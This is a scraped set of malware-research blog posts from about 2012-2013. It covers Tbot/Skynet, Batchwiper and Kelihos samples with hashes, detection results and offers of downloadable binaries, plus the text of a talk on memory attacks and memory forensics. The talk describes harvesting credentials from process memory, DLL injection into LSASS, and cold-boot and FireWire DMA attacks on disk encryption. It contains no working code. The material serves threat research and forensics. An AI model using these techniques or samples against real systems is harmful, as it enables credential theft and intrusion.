Settings\Temporary Internet Files\Content.IE5\17K91ZPH\gate[1].htm %USERPROFILE%\Local Settings\Temporary Internet Files\Content.IE5\1Y7JRJG6\config[1].bin %USERPROFILE%\Local Settings\Temporary Internet Files\Content.IE5\1Y7JRJG6\gate[1].htm %USERPROFILE%\Local Settings\Temporary Internet Files\Content.IE5\1Y7JRJG6\webhp[1].txt State # Tor state file last generated on 2012-12-23 21:40:56 local time # Other times below are in GMT # You *do not* need to edit this file. TorVersion Tor 0.2.2.35 (git-b04388f9e7546a9f) LastWritten 2012-12-24 02:40:56 The description below is from Symantec > "When the Trojan is executed, it creates the following files: > > C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS > FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].exe > C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS > FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].tmp > C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS > FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].upp > C:\Documents and Settings\Administrator\Application Data\tor\cached-certs > C:\Documents and Settings\Administrator\Application Data\tor\cached-consensus > C:\Documents and Settings\Administrator\Application > Data\tor\cached-descriptors > C:\Documents and Settings\Administrator\Application > Data\tor\cached-descriptors.new > C:\Documents and Settings\Administrator\Application > Data\tor\hidden_service\hostname > C:\Documents and Settings\Administrator\Application > Data\tor\hidden_service\private_key > C:\Documents and Settings\Administrator\Application Data\tor\lock > C:\Documents and Settings\Administrator\Application Data\tor\state > C:\Documents and Settings\Administrator\Local Settings\Temp\OpenCL.dll > The Trojan then creates the following registry entry: > HKEY_USERS\S-1-5-21-1172441840-534431857-1906119351-500\Software\Microsoft\Windows\CurrentVersion\Run\{58918AFF-36B7-5CDE-6038-278B35A6192F}: > "C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS > FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].exe" > > The Trojan copies itself to the following location: > %UserProfile%\Application Data > > The Trojan creates a directory with a random name and renames itself with a > random string. > > The Trojan injects itself into an svchost.exe process and terminates the > original process. > > The Trojan connects to an IRC channel and receives commands which may perform > the following actions: > > Steal information from the compromised computer and send it to the remote > attacker > Download and execute files from a remote location > Download and inject files into a running process > Connect to an arbitrary URL > Set up a SOCKS proxy > Support denial-of-service attacks > The Trojan drops the following files: > > Tor: A network client for the Tor anonymous network that is used to route and > hide all the network traffic the threat sends to the IRC C&C server > Trojan.Zbot: An additional threat installed by Trojan.Tbot > CGMiner: An open source bitcoin mining tool used for performing CPU intensive > work in exchange for Bitcoin currency" Automatic scans https://www.virustotal.com/file/12359624ee184639aef4ccca03751ae9ce1371512de52a3a4bfda1970edd0c60/analysis/1356590536/ SHA256:12359624ee184639aef4ccca03751ae9ce1371512de52a3a4bfda1970edd0c60 SHA1:93cf1d65e0374410a9a827256a923fdb8f5f38ca MD5:a0552d1bc1a4897141cfa56f75c04857 File size:10.0 MB ( 10491998 bytes ) File name:vti-rescan File type:Win32 EXE Detection ratio:12 / 44 Analysis date: 2012-12-27 06:42:16 UTC ( 1 minute ago ) AntiVirTR/Drop.Injector.gmtj20121226 AvastWin32:FakeAV-EEX [Trj]20121227 AVGWin32/Cryptor20121226 CAT-QuickHealTrojanDropper.Injector.gmtj20121227 ESET-NOD32a variant of Win32/Injector.YYR20121226 FortinetW32/Injector.YYR!tr20121227 GDataWin32:FakeAV-EEX20121227 IkarusTrojan.SuspectCRC20121227 KasperskyTrojan-Dropper.Win32.Injector.gmtj20121227 PandaTrj/CI.A20121226 TrendMicro-HouseCallTROJ_GEN.R47B1LM20121227 VIPRETrojan.Win32.Generic!BT20121227 https://www.virustotal.com/file/d5aa610a046132f43e3efeb47a0edce10c2d99a641eda8e1d6635f8b9dab44d3/analysis/1356590487/ SHA256:d5aa610a046132f43e3efeb47a0edce10c2d99a641eda8e1d6635f8b9dab44d3 SHA1:21ff7e6c1bc9fb2977f45cde72599a831be3af03 MD5:2e1814cccf0c3bb2cc32e0a0671c0891 File size:17.1 MB ( 17949744 bytes ) File name:vti-rescan File type:Win32 EXE Detection ratio:25 / 44 Analysis date: 2012-12-27 06:41:27 UTC ( 1 minute ago ) AhnLab-V3Dropper/Win32.Injector20121226 AntiVirTR/FakeAV.92.39120121226 AvastWin32:FakeAV-EEX [Trj]20121227 AVGDropper.Generic7.TIN20121226 BitDefenderGen:Variant.FakeAV.9220121227 CAT-QuickHealTrojanDropper.Injector.ggbl20121227 ComodoUnclassifiedMalware20121227 ESET-NOD32a variant of Win32/Injector.YYR20121226 F-SecureGen:Variant.FakeAV.9220121227 FortinetW32/Injector.YYR20121227 GDataGen:Variant.FakeAV.9220121227 IkarusTrojan.SuspectCRC20121227 K7AntiVirusRiskware20121226 KasperskyTrojan-Dropper.Win32.Injector.ggbl20121227 McAfeeArtemis!2E1814CCCF0C20121227 McAfee-GW-EditionArtemis!2E1814CCCF0C20121226 MicroWorld-eScanGen:Variant.FakeAV.9220121227 NormanW32/Troj_Generic.FPNGA20121226 PandaTrj/CI.A20121226 SymantecWS.Reputation.120121227 TrendMicroTROJ_GEN.RCBZ7LB20121227 TrendMicro-HouseCallTROJ_GEN.RCBZ7LB20121227 VBA32Trojan-Dropper.Injector.ggbl20121226 VIPRETrojan.Win32.Generic!BT20121227 ViRobotDropper.A.Injector.1794974420121227 Others have similar detection - mostly generic for this type of malware 19/45 https://www.virustotal.com/file/4eb9799a2c4febffb81260abb889c909b4eaa28344a4e708d2b3231985311ec3/analysis/1356590570/ 34/45 https://www.virustotal.com/file/ab8b7a7e6d5e2f98e85489c0d71e005842c3a6e085f8c4dd9f3011bfc9dbc18d/analysis/1356590585/ 13/45 https://www.virustotal.com/file/9646ebf177136d9a1b3c08aad6b05ce2fca96c6e7a0d32f68d0218b9fe0c40b8/analysis/1356590598/ 21/45 https://www.virustotal.com/file/e46ad827327bdcf841d0eea03675e2f7b3eafbe3a9b8fab96a9e3df586480870/analysis/1356590507/ 13/45 https://www.virustotal.com/file/9646ebf177136d9a1b3c08aad6b05ce2fca96c6e7a0d32f68d0218b9fe0c40b8/analysis/ DEC 2012 BATCHWIPER SAMPLES January 18, 2013, 4:35 am Next Trojan 'Nap" aka Kelihos/Hlux status update by DeepEnd Research and samples Previous Dec. 2012 Skynet Tor botnet / Trojan.Tbot samples 0 0 Update: Jan 18, 2013 - Here is a nice analysis BatchWiper Analysis by Emanuele De Lucia The next time the virus will wake up is Jan 21, 2013. Time to grab it, read and play. Image may be NSFW. Clik here to view.Several people asked for Batchwiper, so here are the samples. From Maher - Iranian CERT: Latest investigation have been done by Maher center in cyber space identified a new targeted data wiping malware. Primitive analysis revealed that this malware wipes files on different drives in various predefined times. Despite its simplicity in design, the malware is efficient and can wipe disk partitions and user profile directories without being recognized by anti-virus software. However, it is not considered to be widely distributed. This targeted attack is simple in design and it is not any similarity to the other sophisticated targeted attacks. The identified components of this threat are listed in the following table: Name MD5 GrooveMonitor.exe [dropper] f3dd76477e16e26571f8c64a7fd4a97b juboot.exe fa0b300e671f73b3b0f7f415ccbe9d41 jucheck.exe c4cd216112cbc5b8c046934843c579f6 SLEEP.EXE ea7ed6b50a9f7b31caeea372a327bd37 WmiPrv.exe b7117b5d8281acd56648c9d08fadf630 File Image may be NSFW. Clik here to view. Download. Email me if you need the password TROJAN 'NAP" AKA KELIHOS/HLUX STATUS UPDATE BY DEEPEND RESEARCH AND SAMPLES February 10, 2013, 3:09 pm Next Manipulating Memory for Fun and Profit by Frédéric Bourla - High-Tech Bridge Previous Dec 2012 Batchwiper Samples 0 0 Image may be NSFW. Clik here to view. FireEye posted details about the sleep function found in Kelihos/Hlux (An encounter with Trojan Nap), which is interesting, and indeed is present in some of the samples we saw. The trojan, of course, has many more features, and most of them were documented in previous publications online. This post is a quick update on the state of Kelihos/Hlux botnet, along with the list of known fast flux domains (1500+) associated with with Kelihos distribution or Command&Control. (current > 2012). The current and most active name servers are pointing to the ns[1-6].boomsco.com, ns[1-6].larstor.com, and ns[1-6].zempakiv.ru which are also fast flux domains. The double fast flux nature of the botnet makes it very difficult to take down, and sinkholing is a temporary measure. Despite the two large attempts to take it down (Sep.2011 and Mar. 2012), the botnet is definitely on the rise again. Please read the rest of our post here http://www.deependresearch.org/2013/02/trojan-nap-aka-kelihoshlux-feb-2013.html. You can download the associated binaries (97 files) and pcap below. Download Image may be NSFW. Clik here to view.Download the file set (97 files, see the listing below). Email me if you need the password Download the pcap (no password) - for 0C921935F0880B5C2161B3905F8A3069 Files Information 97 files, there are a few variants, the files are recent and mostly active. 01B43C0C8D620E8B88D846E4C9287CCD 036ADB0D4B856C2A5E16175BD089FF24 03F3B93A9B3D70D9BB9AD829A5F2361D 0481B4B12C8C69B735CAC2A918B52790 0530898731D7165DBABBF6BF252BA77E 08862142D7313A1D431D67E0E755EFC7 093586512549F2D016AD4C70F4F8E5C8 0BF067750C7406CF3373525DD09C293C 0C921935F0880B5C2161B3905F8A3069 0FEAAA4ADC31728E54B006AB9A7E6AFA 15B6DFADD045E8282C4927F8BDD69D3E 15B9C9632510FB4D387D4A02ABF830DD 1B342E6682167571B55AB59F3DD38D1E 1C04C6B4E0BBBC99CCEE489270C98622 1E08449CE5848B6ADFEE48B1582EAEEF 223D32E3F6BB9C5A6AD3CD58B898EFA1 223F7E425BD28AE13A54B2D0017D1E81 22AE2A6FF14C58265B5C79FBC25A91B6 2304FA9A6A67984CA0FF9E9BF561817A 23585DCBA9DFD4719ECC20B2D662D983 25B4C1C68C58D7D559E8682117D7C01F 288E85A4A7756268EBDED1F356531E03 28A417B0EA5BE796720463607F06CCC9 2B4A5F1C8225D9043AE1302DCCD7063B 2F091B59382F6CA9E1233EE38B171B2E 30EA180ECE416600DABC5ADA0F630D06 352A8AB0D5C7DB40F865B0E7E03B1D96 36C90E73120A419B4B00E66177040F43 3774D5BD50F4286531FEDF716D83FC6E 396B88D48CC04A8C37F4409F65EA8A97 3A76AA2439112479635D7172DB2440B1 3B6A3354B71CD674D4BC27646D270502 3D0F09DA5C5DBDB2124AEB0953F355B7 3D711B47C8FDE2C6A5E62D6AD0BA7BB5 44B342383E286465D74A838EE0780DDA 49B6D19F9307C3BBA460C936ADE26B70 4B6DFE2A4B0EF515275AC84B378D5F6F 4C2DB57ED5D27F54120765A9FA9C3BC7 51D3E04AF7E29A1E3A1748E03F0BD578 56AD23082E5E73AAEB95E5A915DF5444 5ACA74320003576F79CF6EDD0629CC13 5B947FEAA5BFA951C94B11BB9EEA9BC3 5BA7D2DE0CCC58F104240610BF297E6E 5BECB2498EA801ED010DD073007E20CE 5FFE38CA9FE07394D1BC5C270E83B253 63C926F659C3EDEC0B85C91898622A4D 69170C0C9FB4EEC6A630C4C9182505F0 6AA100C459E854A9A334B10468EAD014 6B873B6D21ECC9ADF7246D644B23FB84 6F6B016A5DB1791188D7C98A464292CC 70FD6A11E482D756BEF27546AA112206 72C1BEC266B23AF5CB12AE2F669D8784 7316D0EE9C0B6C23C7CEB2D04DC6B665 766A50581F6E47FF94126C5DBBD9FB01 76B7BB0CC2E3623078BF9E9A9A343CE1 77E2D2A1E508EA30D548293E2C36D64F 787F39D70D2BEC3139A6EA7690B88464 7E1B91800F2FE9974C7BB18A7097D933 7F7E0C58BDF1E47059DD84FFB301F6B7 8005E44761B842370D43299B29B0F16A 80E595253D3E02071D2564BA8296D308 84741D6DFFC996D35B8DC0A01111A5DE 9010DD12A1419E0F0098FD10CA324E23 9424EB9DE0558193A6B4D9607C23CBD5 9C075FB471DC66394090C8BFAA4739A4 9CA42C5B352DEFB53F8D30C16B36697A A13B21423C5AE7BA318D0D26E672AD22 A15F02836309B819DE10068ED49D5D87 A56577564E52251C54B27D4CA62C266F A78BE2345E524515E0DD1CCCA3C524F9 A8ABECD7C571AAEE6C964514133585F3 A910A324394B56022C7AC10DB22EC3F6 B1ABD1279A28F22B86A15D6DAFBC28A5 B568CF0982C867CD499F953E43738511 B63F25D5B02FE00D9423A7CCC0C3CCE2 B66475ED30943C0056C9402DCAECB8B9 BB5560123C62588988BC22C704CD9E03 C06414E1994BF4EFA41911CA81099411 C465888536A6785883079043F38143BD C98F3F5709292D6D97AD96C1A8459A81 CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94 CCA50DCB8A30B325BF10CED5DAE4D51A CE391D2B2036365D8943257FE1CB967E D4CBEABAE5B4D4BAF14F554C8E9A4E86 DCE41A00FB703B6A6324CE4F4C4DB143 DE5FDBAD9274B21EA5391F48441D33D8 DEAF70F248599985FC32B083F16F251A DF1A932144BF2C6E50FD090FDC1F1408 DFE01E12671BBDD7EC0F8BEBA08EC440 E2F8F5C80566BF32E1841B3C5A669D42 E453463A428A71A5DB19FC18807E747B EB17EB2F02FA871C005C569B3299FCBA EB4DBB18D00321A809A6C4D8594DDF5A F5A6FC81A4F5AE6DEBFAC463DD49E1C2 F604C7E4EC3A12A83E0852A9D7FE75CA F96EBF8128BFC6965C73A2659718C663 FE501F12B34701CF8AF5DD307C314862 Search RSSing.com -------------------------------------------------------------------------------- MANIPULATING MEMORY FOR FUN AND PROFIT BY FRÉDÉRIC BOURLA - HIGH-TECH BRIDGE February 15, 2013, 6:57 pm Next Jan 2013 - Linux SSHDoor - sample Previous Trojan 'Nap" aka Kelihos/Hlux status update by DeepEnd Research and samples 0 0 Image may be NSFW. Clik here to view.I am sure you remember excellent reverse engineering presentations by High-Tech Bridge experts I posted earlier. High-Tech Bridge presented at the ISACA event in Luxembourg and you can download their detailed and very interesting presentation: “Manipulating Memory for Fun and Profit". The presentation includes detailed memory forensics process using Volatility by Frédéric BOURLA Chief Security Specialist Head of Ethical Hacking & Computer Forensics Departments High-Tech Bridge SA Table of Contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion Download the full presentation in PDF The text of the presentation (for Google search and to get an idea about the contents:) ======================== Manipulating Memory for Fun & Profit 6 February 2013 Frédéric BOURLA Chief Security Specialist ======================== # readelf prez * Slides & talk in English. * Native French speaker, so feel free to send me an email in French if case of question. * Talk focused on Memory Manipulation, from both offensive and defensives angles. * 1 round of 45’. * Vast topic, lots of issues to address, and lots of slides so that the most technical of you can come back later to remember commands. * Therefore some slides [specially the beginning] will be fast, but everything is summarized in demos. * No need to take notes, the whole slides and demos will be published on High-Tech Bridge website. ======================== # readelf prez * Despite its name, this talk will not deal with Total Recall or any other human memory manipulation based movie. * Nor will it deal with classical binary exploitation, such as Stack based Buffer Overflows or Heap Spraying. I strongly advice to read corelanc0d3rs’ papers on corelan.be to learn more regarding Exploit Writing. ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== # man mem * RAM (Random Access Memory) is a temporary memory accessible by the CPU in order to hold all of the program code and data that is processed by the computer. * It is called “random” because the system can directly access any of the memory cells anywhere on the RAM chip if it knows its row (i.e. “address”) and its column (i.e. “data bit”). * It is much faster to access data in RAM than on the hard drive. * CPU and OS determine how much and how the available memory will be used. ======================== # man mem * In other words, most users do not have any control on memory, which makes RAM a target of choice. * First systems were arbitrary limited to 640Kb RAM. Bill Gates once declared that “640K ought to be enough for anybody”. * At this time it was far enough… But today the OS itself can consume 1 Gb. We therefore use much more memory. * On a 32 bits Windows system, OS can directly address 2^32 cells, and is therefore mathematically limited to 4 Gb memory. ======================== # man mem * Contrary to popular assumption, RAM can retain its content up to several minutes after a shutdown. * Basically RAM is everywhere nowadays. Printers, fax, VoIP phones, GPS and smartphones are good examples. * This provide some opportunities to security professionals [and also to bad guys]. Some points of this talk can be applied to various targets and may not be limited to Windows systems, even if since now we will deal with a classical Microsoft host. ======================== # man mem * Upon process instantiation, the code is mapped in memory so that the CPU can read its instructions, and each process has his own virtual memory. * OS relies on page table structures to map transparently each virtual memory address to physical memory. * But most importantly, any program [including both its data and its instructions] must first be loaded into memory before being run by the processor. ======================== # man mem * For example, FUD Trojans which highly rely on Packers & Crypters can be quickly uncovered through memory analysis. * The same principle applies to OFTE. Memory Analysis can save your investigator's life, should you be facing a drive with On The Fly Encryption capabilities. To be efficient, transparent and usable, the [encrypted] key should be somewhere in memory. ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== Post keylogging capacities * A colleague just used your laptop to access a restricted page, and you regret you didn’t have time to run your favourite keylogger? :-] ======================== Post keylogging capacities * No a problem, you may be able to browse the Internet browser’s memory to grab his credentials. ======================== Post keylogging capacities * Besides this joke, have you ever wished you had saved your new email before a touchpad problem occurs and make you loose 30 minutes? ======================== Post keylogging capacities * But you may not be obliged to restart writing everything from scratch if you browse the process memory shortly. ======================== Stars revelation * In a pivoting attack, it can be very useful to reveal what’s behind the stars... Don’t forget, Windows remembers lots of passwords in behalf of users. * Lots of tools do exist, such as Snadboy's Revelation. Unfortunately, most of them do not work against recent OS. * BulletsPassView is one of the remaining tools which still works under Windows 7. There is even a 64 bits version. * Anyway, it also does not work under Windows 8. ======================== Stars revelation ======================== Stars revelation * Pillaging passwords often provide the keys of the kingdom. ======================== Memory Patching * Memory Patching is the first stone to build a Crack or create a Keygen in the Warez world. * It basically consists of locating and bypassing binary protections in memory in order to finally implement the trick in the targeted file. ======================== Memory Fuzzing * Fuzz Testing, aka Fuzzing, consists in providing invalid, unexpected, or random data to the inputs of a monitored program to detect security issues [among others]. * General approach to Fuzzers: ======================== Memory Fuzzing * Memory-oriented Fuzzing: ======================== Memory Fuzzing * Here is an example from dbgHelp4j, a memory fuzzing project under development at High-Tech Bridge: * To learn more, read Xavier ROUSSEL’s paper. * This short demonstration shows how dbgHelp4j permits to identify rapidly an old buffer overflow in the CWD Command of Easy FTP Server v1.7.0.11. ======================== DLL Injection * Another well-known memory abuse consists in injecting arbitrary code into the memory space of another process, for example through a CreateRemoteThread like function. * Such an injection permits the attacker to benefit from the rights of the target process, and often to bypass firewalls. * This also enable its author to hide himself from most users, as threads are not displayed in Windows Task Manager. ======================== DLL Injection * Native task manager does not display current threads within a process. ======================== DLL Injection * Here a DLL based Reverse Trojan is injected into IE memory space. ======================== DLL Injection * Trojan reaches its C&C Server via HTTP through Internet Explorer [whose behaviour sounds right]. ======================== DLL Injection * From a Pivoting Attack point of view, DLL Injection is widely used during Privilege Escalation. * There are a lot of tools, such as CacheDump, PWDump6, LSADump2 or PWDumpX. * Most tools actually inject their nasty code into the Local Security Authority Subsystem (LSASS) to reach hashes. * The latter is amazingly efficient and permits a user with administrative privileges to retrieve [either locally or remotely] the domain password cache, password hashes and LSA secrets from a Windows system. ======================== Process Memory Dump * Some processes write sensitive data in memory in clear text format, or without relying on heavy encryption. * Specific process memory dumps may allow an attacker to grab interesting data. * Lots of tools do exist. One of the best ones is probably ProcDump, from Mark Russinovich. * It’s a powerful command-line utility which primary purpose is to monitor applications for CPU spikes in order to generate a crash dump with the purpose of helping the developer to debug. ======================== Process Memory Dump * It has plenty of amazing features. Anyway, here our goal is simply to dump the memory contents of a process to a file [without stopping the process of course]. * So lots of tools can also do the job, such as PMDump from NTSecurity. * Sometimes we can find very sensitive information, such as usernames, computer names, IP addresses, and even passwords. * This is for example the case if you dump the memory of PwSafe. Not all fields are encrypted in memory. ======================== Process Memory Dump * For sure, password fields are not stored in memory in plaintext, but unfortunately other fields are. And sysadmin’s notes are often very juicy... * There is hope to collect credentials, map network resources, identify services, ports, sudoers account, and so on. * Even if the auditor is unlucky and does not grab passwords, he can still create a user list file for further dictionary attacks. ======================== Process Memory Dump * Process Memory Dump files are quite light. * During a Pivoting Attack in an Internal Penetration Test, it may worth a try to launch a memory dump against sensitive processes. ======================== Process Memory Dump * Something as easy as parsing the process memdump for strings may reveal interesting stuff to a pentester. ======================== Process Memory Dump * Here the Password Safe application permits an attacker to fingerprint the network, and to collect usernames, IP addresses and ports. * Very useful to carry out further attacks. ======================== Process Memory Dump * Here the network administration tool mRemote leaks internal path, IP address and TCP port of an SSH enabled server… As well as the username & password of a root account! ======================== Full Memory Dump * If you have a good bandwidth and you are not so limited by the time, why not dumping the whole memory? * An offline analysis of the whole memory dump may even reveal more important stuff. Even in the case of FDE, users may have opened sensitive TXT documents for example. * You may add DumpIt to your toolkit. It is a one-click memory acquisition application for Windows released by MoonSols. It’s a great tool which combines win32dd and win64dd in one executable. It is fast, small, portable, free and ultra easy to use. Just run in to dump the physical memory in the current directory. ======================== Cold Boot Attacks * It is a common belief that RAM looses its content as soon as the power is down. * This is wrong, RAM is not immediately erased. It may take up to several minutes in a standard environment, even if the RAM is removed from the computer. * And it may last much longer if you cool the DRAM chips. With a simple dusty spraying at -50°C, your RAM data can survive more that 10 minutes. * If you cool the chips at -196°C with liquid nitrogen, data are hold for several hours without any power. ======================== Cold Boot Attacks * It is then possible to plug the RAM in another system to dump their content to carry out an offline analysis. * In particular, encryption tools deeply rely on RAM to store their keys. Therefore such attacks are mostly aimed to defeat FDE, such as BitLocker, FileVault, dm-crypt, and TrueCrypt. * And even if there is some kinds of degradation in the memory contents, some algorithms can intelligently recover the keys. * To know more, read the Princeton University's paper. ======================== DMA based attacks * IEEE1394, aka FireWire, is a serial bus interface standard for high-speed communications and isochronous real-time data transfer. * According to Wikipedia, it “supports DMA and memory-mapped devices, allowing data transfers to happen without loading the host CPU with interrupts and buffer-copy operations”. * In other words, you can read [and write] in the target’s memory through its FireWire interface! * This security problem is not new [2004], but still exists today as it relies in IEEE 1394 specifications. ======================== DMA based attacks * A few years ago, attackers could use WinLockPwn. Today they have Inception tool, from ntropy. * Inception is a physical memory manipulation and hacking tool which nicely exploits IEEE 1394 SBP-2 DMA [Serial Bus Protocol 2]. * The tool can unlock and escalate privileges to Administrator / Root on almost any powered on machine you have physical access to. * The tool works over any interface that expands and can master the PCIe bus, such as FireWire, Thunderbolt, ExpressCard and PCMCIA (PC-Card). ======================== DMA based attacks * It is initially made to attack computers that utilize FDE, such as BitLocker, FileVault, TrueCrypt or Pointsec. * You just need a Linux / Mac OS X system and a target which provides a FireWire / Thunderbolt interface, or an ExpressCard / PCMCIA expansion port. * There are for sure some limitations, such as the 4 GiB RAM bugs or the restrictions on OS X Lion targets [which disables DMA when the user is logged out as well as when the screen is locked if FileVault is enabled], but most often FireWire means P0wned. ======================== DMA based attacks * Just a few lines to install on a your BackTrack: * The short following demo of Inception exploits the FireWire interface of an up-to-date Windows 7 system to patch the msv1_0.dll file and unlock the running session. ======================== DMA based attacks * This kind of DMA based attacks also permit to attack mounted encrypted volumes, such as a TrueCrypt archive. * You can for example boot your attacking system with PassWare FireWire Memory Imager from Passware Kit Forensics, and search for AES keys in the target memory through FireWire. * You can basically defeat BitLocker, TrueCrypt, FileVault2 & PGP encryption volumes. * To know more: http://www.breaknenter.org/projects/inception/ http://support.microsoft.com/kb/2516445 ======================== DMA based attacks * The following slides illustrate an attack on a TrueCrypt volume created on an 8 Gb memory stick. * First step was to backup the encrypted drive. ======================== DMA based attacks * Then let’s begin the attack on a mounted volume when the user went. ======================== DMA based attacks * Dump the physical memory of the target system through our favourite FireWire interface. ======================== DMA based attacks * And attack the key material in memory… ======================== DMA based attacks * The attack only last a couple of minutes. ======================== DMA based attacks * And you should get an unencrypted raw volume. ======================== DMA based attacks * You just have to fill a new memory stick with this raw image… ======================== DMA based attacks * And that’s it ! Just plug your new device… ======================== DMA based attacks * And enjoy your TrueCrypt less volume. ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== Circumventing FDE * Traditional Forensics approach faces problem with encryption, especially with FDE. * If the investigator “pulls the plug” and creates a bit-for-bit image of the physical hard drive, he most probably destroys the best chance of recovering the plaintext data, as well as all common memory artefacts. * With FDE, it is usually far better to make a bit-for-bit image of the logical device while the system is still running, even if underlines disk activities are generally not welcome… And even if we rely on an untrusted OS to present what is actually on the disk, therefore prone to anti-forensic techniques. ======================== Circumventing FDE * If we begin by capturing the volatile memory, then we can potentially extract the cryptographic keys from the memory image to decrypt and analyse the disk image. * The only one challenge usually consists in uniquely identifying key materials among gigabytes of other data. * It is usually achieved with a mixed of entropy analysis [limited because of the short length of symmetrical keys and the randomness of other data, such as compressed files] and brute force attack [Known-Plaintext Attack, where the attacker has samples of both the plaintext and the ciphertext]. * To learn more: “RAM is Key - Extracting Disk Encryption Keys From Volatile Memory", by B. Kaplan and M. Geiger). ======================== Code Analysis via API Hooking * A quick way to have an idea of what a binary does is to analyse its API calls. * You can do it easily with APISpy32 for example, from Pietrek. * You just need to populate a configuration file with the name of all the API [e.g. per a strings] you want to enable Hooking, and you get a nice malcode monitoring tool. * Next slide shows common API use in malware. ======================== Code Analysis via API Hooking Common API Malware URLDownloadToFile, FtpGetFile, FtpOpenFile Dropper CreateRemoteThread, NtWriteVirtualMemory, LoadLibrary and similar (LoadLibraryA, LoadLibraryExA, LoadLibraryExW, etc.) Injection BeginPaint (to disable local screen changes when a VNC session is activated) Zeus Accept, Bind Backdoor Connect, CreateNamedPipe, ConnectNamedPipe, DisconnectNamedPipe Dropper and Reverse Trojan IsDebuggerPresent, CheckRemoteDebuggerPresent Anti debugger ======================== Code Analysis via API Hooking Common API Malware CryptCreateHash, CryptEncrypt, CryptGetHashParam Encryption DeviceIoControl, NtLoadDriver, NtOpenProcess Rootkit HttpOpenRequest, HttpSendRequest, InternetConnect Exfiltration ModifyExcuteProtectionSupport, EnableExecuteProtectionSupport, NtExecuteAddFileOptOutList DEP SetSfcFileException Windows File Protection alteration ======================== Memory Forensics * It is probably the best way to identify the most hidden evil code, such a Rootkits. * And don't forget that some malware can live in memory without ever touching the hard disk. This is for example the case with MSF Meterpreter, which is injected into existing process memory. * Stealth malware also work in that manner [mostly in targeted hacking against big companies]. * Hard disks are amazingly big today. Simply creating a raw image can take very long time... Sometimes several days. Analysing memory is much faster. ======================== Memory Forensics * But there are also some minor drawbacks… Indeed, the memory image will only give us information on what was running at a particular time. We will not see the most visible piece of malcode if it was not running when we proceed with the imaging [unless some tracks remain in undeleted structures]. * And fore sure, to make an image of the memory we first need to run once a specific utility... Which will be loaded in the targeted memory! As a consequence, it is always possible to alter evidence [even if chances are really low with a light utility]. * Anyway, it definitely worth a try as a fast analysis can help you spot the evidence very quickly. :-] ======================== Memory Forensics * Any kind of physical memory abstract could be usable, such as a Memory Dump, a Crash Dump, an hibernation file or a VMEM file for virtual machines. ======================== Memory Forensics * Memory Forensics is a very huge project, as memory mappings differ from OS, SP and patch levels, and as vendors usually do not really document their internal memory structures. * Nevertheless, it is mature and efficient since a few years. Nowadays, we are not limited anymore to ASCI and Unicode grep, and we can now rely on powerful tools which parse well known memory structures. ======================== Memory Forensics * For sure, we are still facing challenging problems, and tools may be limited by Paging and Swapping which can prevent investigators from analysing the whole virtual address space of a specific process [unless they also dig into the pagefile.sys for example]… * But it is still really effective for Malware Analysis! * Besite commercial tools, free solutions do exist, such as Radare and Volatility. The later simply became impressing. * Since last year, Volatility also support MAC systems. ======================== Memory Forensics * Shall you need to carry out a Memory Forensics on a Windows, Linux, Mac or Android system, I strongly advise you to have a look on Volatility. * It is basically a Python based tool for extracting digital artefacts from volatile memory [RAM] samples which offer an amazing visibility in the runtime state of the system. * You can easily identify running processes and their DLL, Virtual Address Descriptor [VAD], System call tables [IDT, GDT, SSDT], environment variables, network connections, open handles to kernel and executive objects, and so on. ======================== Memory Forensics * It can even be used to dump LM and NTLM hashes, as well as LSA secrets… ======================== Memory Forensics * Well, for French targets there is a little bug [because of accents]... You will have to adapt a little bit the code: ======================== Memory Forensics * But beside this, it is really efficient to track malcode. Let’s dig into a real example… ======================== Memory Forensics * Heavy malware may be digitally signed by a trusted CA. ======================== Memory Forensics * And may be really appear benign to your users. ======================== Memory Forensics * Here it was an obfuscated .Net based Dropper. ======================== Memory Forensics * Even if you manually find the embedded payload, nearly everything is packed to disturb Reverse Engineers. ======================== Memory Forensics * The only one unencrypted payload was a kind of anti-restoring feature, which basically hooks specific API to prevent system administrators to remove the malware [e.g. by killing his task manager]. * And then? What’s next? We could spend lots of time in a Reverse Engineering phase, or analyse its behaviour in a sandbox [if the code doesn’t detect it]… * …And we can simply see what’s happen in memory. ======================== Memory Forensics * Just infect voluntarily your VM or your lab workstation. * And use one of the good existing tools to dump the whole memory: * Memory from Mandiant * FTK Imager from AccessData * FastDump from HB Gary * DumpIt and Win32dd / Win64dd from Moonsols * And of course your favourite FireWire interface * Before using Volatility to dissect this memory dump. ======================== Memory Forensics * Let’s begin to get basic information on our dump file. ======================== Memory Forensics * The PSLIST command quickly show processes. ======================== Memory Forensics * You can arrange them by tree view. ======================== Memory Forensics * This process list can be quickly obtained by parsing a Kernel double chained list. Nevertheless, this list can be altered by malware, such as Rootkits, which therefore hide themselves from common system tools. * A deep research can then be achieved, which consist in parsing the whole memory dump to locate EPROCESS structures. These Kernel structures do exist for each process, no matter what the double chained list [known as Process Control Block] is. * A process listed in a PSCAN and not in a PSLIST often indicate a threat [mostly permitted via API Hooking]. ======================== Memory Forensics * The PSCAN is longer but may reveal hidden code. ======================== Memory Forensics * Similarly, you can find processes which attempt to hide themselves on various process listings through the PSXVIEW command: ======================== Memory Forensics * Several Volatility commands works in this way and offer a SCAN variant to try to recognize specific structures in memory, thus revealing hidden sockets and connections for example. * For sure you may have [often quickly identified] false positives, as some process may gave been legitimately closed for example, thus letting some orphan EPROCESS data structures in RAM. * Nevertheless, some process may still be really running, and therefore instantaneously reveal a serious security issue. ======================== Memory Forensics * Established and recently closed connexions are also quickly revealed. 